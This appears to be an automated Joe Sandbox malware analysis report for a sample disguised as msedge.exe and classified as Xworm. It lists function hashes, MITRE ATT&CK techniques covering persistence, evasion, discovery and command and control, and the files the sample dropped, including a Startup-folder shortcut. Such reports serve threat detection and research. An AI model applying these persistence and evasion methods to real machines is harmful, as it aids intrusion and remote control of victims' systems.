Snapshot File: hcaresult_11_2_7ffd9b890000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5061dfe577955b7a4e3a6d797cad0bfe69008f821a9882b36647f01117732e45
Instruction ID: bd104b674075ea66b7b16fb166ab0a4d5e4aac2aae021b33ab31dc85b3fa6e0a
Opcode Fuzzy Hash: 5061dfe577955b7a4e3a6d797cad0bfe69008f821a9882b36647f01117732e45
Instruction Fuzzy Hash: A4715912B1E6CA0FE766A77858396B97FE1DF8621470900FBD08CC71E7DD1C68468392

Function 00007FFD9B8912F9 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3534295637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b890000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0331023326819761f581b5ad986e06296e35facccb3a4c34f8e9345381e0361
Instruction ID: 3c7441b4a908a45ae5820245e7b4cdc518e0897546cf2106ee0d6a662407e876
Opcode Fuzzy Hash: e0331023326819761f581b5ad986e06296e35facccb3a4c34f8e9345381e0361
Instruction Fuzzy Hash: 3B717521B2D90D9FDB98B778847DABD77E2FF88304B904478E41EC32DADD28A9058741

Function 00007FFD9B89115D Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3534295637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b890000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f1c1b974b116e94adca0be3d3956671b39199f2298873fadb2304bc67768a3f
Instruction ID: 96d928809043e0aa661d93bfa9dcfb53c9cb10557defd4177d46722f748b95e7
Opcode Fuzzy Hash: 0f1c1b974b116e94adca0be3d3956671b39199f2298873fadb2304bc67768a3f
Instruction Fuzzy Hash: 0D413632F0DA5E5BEB54F7ACA8B11EDBBB0EF89254B0401B7C099D71E3ED2428068340

Function 00007FFD9B890588 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3534295637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b890000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4027d82459ddc8555dc0c295cc7025fbc5bc4f8d6e5acb96ef3c10586387cb
Instruction ID: 4a2e063747f2139c468b9410b161b8ab65a5e2738ae71ee11348635b17dbc5c8
Opcode Fuzzy Hash: af4027d82459ddc8555dc0c295cc7025fbc5bc4f8d6e5acb96ef3c10586387cb
Instruction Fuzzy Hash: 5A31F721B189484FEB9CEB6C9869778A6C2EF9C715F0505BEF05EC32E7DD64AC418341

Function 00007FFD9B890B09 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3534295637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b890000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c418e5779170fdd40007c2d52957bbf3e7021019f8a35a49fc6926b41f51021
Instruction ID: eed39bff791aeba29a73ec2ab6ed300c52e0e5cf56eac70602d272caf994d5a7
Opcode Fuzzy Hash: 1c418e5779170fdd40007c2d52957bbf3e7021019f8a35a49fc6926b41f51021
Instruction Fuzzy Hash: D431E921B19A198FEB99B7BC5C297BC76D2FF98701F0401BBE00DC32D6DD1869018381

Function 00007FFD9B8909CD Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3534295637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b890000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4457ffdb5bb40cd26ce1c5cb4c3e1092defc1ae91e62544d146e246b6f6f3569
Instruction ID: 03c401d28bd6b0b52f589749dee2737325b7676577da8371a27b0e7003ad04e3
Opcode Fuzzy Hash: 4457ffdb5bb40cd26ce1c5cb4c3e1092defc1ae91e62544d146e246b6f6f3569
Instruction Fuzzy Hash: 90317F71B1890E8FDB48FBA8C8656ADBBA1FF98300F9041B9D019D32D6DE3868458741

Function 00007FFD9B8911C8 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3534295637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b890000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f05b3bf2386bdb0009428df667938a2838a671489cff7637d44e8c13e0b6ba28
Instruction ID: 47cb58ef9fd2043233924b1c2a3c0a3b1addf80863fc3f390309763e5e0ef35f
Opcode Fuzzy Hash: f05b3bf2386bdb0009428df667938a2838a671489cff7637d44e8c13e0b6ba28
Instruction Fuzzy Hash: F631C222A0D98F5BEB54F7A888A11EDBBB1FF98250F450176D059E32E6DD2429468340

Function 00007FFD9B89085D Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3534295637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b890000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0f6ef5f9c387bcfa8fd1790d95eca7d292af069cfcd695622496cd85244649d
Instruction ID: fb68cd6ef1fc1294dce798cadc6818c1c8ef21f0a0a5fc778a22fc86e92a8628
Opcode Fuzzy Hash: e0f6ef5f9c387bcfa8fd1790d95eca7d292af069cfcd695622496cd85244649d
Instruction Fuzzy Hash: EE31893071994D8FD38CFB5C84A99AEBB71FF88208BD081A5D519C37CEDD3868898756

Function 00007FFD9B892191 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3534295637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b890000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72b0ad9cb044d44528a38a62777f761d5e5e9d2c512d46ae3af34666f979e0de
Instruction ID: ce1483bd37acff2cfd41f2e6762d0edf2f0f6f72952f544de3a79f97a222e429
Opcode Fuzzy Hash: 72b0ad9cb044d44528a38a62777f761d5e5e9d2c512d46ae3af34666f979e0de
Instruction Fuzzy Hash: 6E012814A0E6990FEB59AB780C648753FA0DF89690B0905FBE488C70E7DD086A8A8352

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report msedge.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_2c2ca92dcd483d7a57334730825da1e95a3edac_e2b55a38_ee85a960-0b5e-4b89-bdc6-b3f5bd0c3ccc\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A3A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D19.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D59.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\msedge.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

Windows Analysis Report
msedge.exe

Function 00007FFD9B881567 Relevance: 2.0, Strings: 1, Instructions: 784
COMMON

Function 00007FFD9B888BF6 Relevance: .6, Instructions: 561
COMMON

Function 00007FFD9B8899A2 Relevance: .5, Instructions: 543
COMMON

Function 00007FFD9B88400D Relevance: 1.7, APIs: 1, Instructions: 154
COMMON

Function 00007FFD9B884A88 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre